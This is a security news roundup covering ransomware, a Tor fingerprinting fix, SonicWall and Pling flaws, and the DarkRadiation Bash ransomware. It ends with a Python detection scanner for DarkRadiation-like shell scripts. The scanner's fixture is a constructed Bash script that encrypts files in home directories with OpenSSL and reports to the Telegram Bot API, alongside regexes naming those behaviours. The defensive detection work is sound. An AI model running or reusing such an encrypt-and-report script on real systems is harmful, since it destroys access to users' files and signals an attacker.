[Whitepaper] Automate Your Security with Cynet to Protect from Ransomware

It seems like every new day brings with it a new ransomware news item – new attacks, methods, horror stories, and data being leaked.

Ransomware attacks are on the rise, and they’ve become a major issue for organizations across industries. A recent report estimated that by 2031, ransomware attacks would cost the world over $260 billion.

A new whitepaper from XDR provider Cynet demonstrates how the company’s platform can help organizations mitigate the impact of ransomware (download here).

Today, attackers have shown little interest in sparing even the most vulnerable sectors, such as health care providers and hospitals. With a parallel increase in the number of variants – WastedLocker, FTCode, Tycoon, TrickBot, REvil, and many others – it’s becoming harder to defend against the growing threat of ransomware.

Ransomware operates by using a variety of infection and encryption techniques to steal companies’ files or lock them behind a ransom demand. Even though many of the most common techniques have become public and organizations can defend against them, new, unknown methods can arrive without notice.

Patch Tor Browser Bug to Prevent Tracking of Your Online Activities

The open-source Tor Browser has been updated to version 10.0.18 with fixes for multiple issues, including a privacy-defeating bug that could be used to uniquely fingerprint users across different browsers based on the apps installed on a computer.

In addition to updating Tor to 0.4.5.9, the browser’s Android version has been upgraded to Firefox 89.1.1, incorporating the patches Mozilla rolled out for several security vulnerabilities addressed in Firefox 89.

Chief among the rectified issues is a new fingerprinting attack that came to light last month. Dubbed scheme flooding, the vulnerability enables a malicious website to leverage information about installed apps on the system to assign users a permanent unique identifier even when they switch browsers, use incognito mode, or a VPN.

Put differently, the weakness takes advantage of custom URL schemes in apps as an attack vector, allowing a bad actor to track a device’s user between different browsers, including Chrome, Firefox, Microsoft Edge, Safari, and even Tor, effectively circumventing cross-browser anonymity protections on Windows, Linux, and macOS.

SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks

A critical vulnerability in SonicWall VPN appliances that was believed to have been patched last year has now been found to be “botched”: the company left a memory leak flaw unaddressed, until now, that could permit a remote attacker to gain access to sensitive information.

The shortcoming was rectified in an update rolled out to SonicOS on June 22.

Tracked as CVE-2021-20019 (CVSS score: 5.3), the vulnerability is the consequence of a memory leak when sending a specially-crafted unauthenticated HTTP request, culminating in information disclosure.

It’s worth noting that SonicWall’s decision to hold back the patch comes amid multiple zero-day disclosures affecting its remote access VPN and email security products that have been exploited in a series of in-the-wild attacks to deploy backdoors and a new strain of ransomware called FIVEHANDS.

However, there is no evidence that the flaw is being exploited in the wild.

Unpatched Flaw in Linux Pling Store Apps Could Lead to Supply-Chain Attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for the Linux platform that could potentially be abused to stage supply-chain attacks and achieve remote code execution (RCE).

“Linux marketplaces that are based on the Pling platform are vulnerable to a wormable [cross-site scripting] with potential for a supply-chain attack,” Positive Security co-founder Fabian Bräunlein said in a technical write-up published today. “The native PlingStore application is affected by an RCE vulnerability, which can be triggered from any website while the app is running.”

The Pling-based app stores impacted by the flaw include —

  • appimagehub.com
  • store.kde.org
  • gnome-look.org
  • xfce-look.org
  • pling.com

PlingStore allows users to search and install Linux software, themes, icons, and other add-ons that may not be available for download through the distribution’s software centre.

Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.

“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”

As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.

The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “185.141.25.168”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.

DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files, as well as on the Telegram API to communicate with the C2 server via hardcoded API keys.
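The behaviours the report describes (a Bash script, OpenSSL AES-CBC file encryption, and Telegram Bot API calls with a hardcoded key) are a useful combination to hunt for in shell scripts found on Linux hosts and in container images. The following Python scanner is an added example written for this page; it is not Trend Micro’s tooling and not a signature for the actual DarkRadiation samples. The indicator regexes, the approximate bot-token shape, and the two sample scripts are all constructed assumptions, and the scanner grades the co-occurrence of indicators rather than any single one, since OpenSSL encryption alone is common in legitimate backup jobs.

```python
import re
from dataclasses import dataclass

# Heuristic indicators distilled from the behaviours described in the report
# (Bash script, OpenSSL AES-CBC file encryption, Telegram Bot API used for C2
# with a hardcoded API key). They are constructed for this example and are
# not a signature of the DarkRadiation samples themselves.
INDICATORS = {
    "bash_shebang": re.compile(r"^#!\s*/(?:usr/)?bin/(?:env\s+)?bash\b", re.M),
    "openssl_aes_cbc": re.compile(r"\bopenssl\s+enc\b[^\n]*-aes-(?:128|192|256)-cbc\b"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    # Telegram bot tokens have the shape "<numeric id>:<secret>"; the pattern
    # below is an approximation used for illustration only.
    "hardcoded_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{30,}"),
}


@dataclass(frozen=True)
class ScanResult:
    verdict: str   # "clean", "review" or "suspicious"
    hits: tuple    # indicator names that matched, sorted
    lines: tuple   # (indicator, 1-based line number of first match) pairs


def scan_script(text: str) -> ScanResult:
    """Scan one shell script's contents and grade the combination of indicators."""
    hits, lines = [], []
    for name, rx in INDICATORS.items():
        m = rx.search(text)
        if m:
            hits.append(name)
            # Line number of the first match, for the analyst's context.
            lines.append((name, text.count("\n", 0, m.start()) + 1))
    hit_set = set(hits)
    # Encryption plus Telegram C2 inside a single shell script is the pairing
    # the report describes; either behaviour alone is common in benign automation.
    if {"openssl_aes_cbc", "telegram_bot_api"} <= hit_set:
        verdict = "suspicious"
    elif hit_set - {"bash_shebang"}:
        verdict = "review"
    else:
        verdict = "clean"
    return ScanResult(verdict, tuple(sorted(hits)), tuple(sorted(lines)))


# Constructed sample: a nightly backup job that legitimately uses AES-CBC.
BENIGN_BACKUP = """#!/bin/bash
# Constructed example: nightly backup that encrypts an archive with a local key.
tar czf /tmp/backup.tgz /srv/data
openssl enc -aes-256-cbc -pbkdf2 -pass file:/etc/backup.key -in /tmp/backup.tgz -out /srv/backup.enc
"""

# Constructed sample modelled on the behaviours in the report (not real malware):
# a hardcoded bot token, AES-CBC encryption, and a Telegram status message.
SUSPICIOUS_SCRIPT = """#!/bin/bash
# Constructed example, not a real sample.
TOKEN="123456789:AAEXAMPLEexampleexampleexampleexample"
for f in /home/*/*.txt; do
  openssl enc -aes-256-cbc -pass pass:"$KEY" -in "$f" -out "$f.enc"
done
curl -s "https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=0&text=done"
"""

if __name__ == "__main__":
    for label, sample in (("backup", BENIGN_BACKUP), ("sample", SUSPICIOUS_SCRIPT)):
        r = scan_script(sample)
        print(f"{label}: {r.verdict} hits={r.hits} lines={r.lines}")
```

Run over a directory of `.sh` files or extracted container layers, the "review" verdict surfaces scripts that merely encrypt (the backup job above), while "suspicious" is reserved for scripts that both encrypt files and talk to the Telegram Bot API, with the matched line numbers pointing the analyst at the token and the C2 call.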
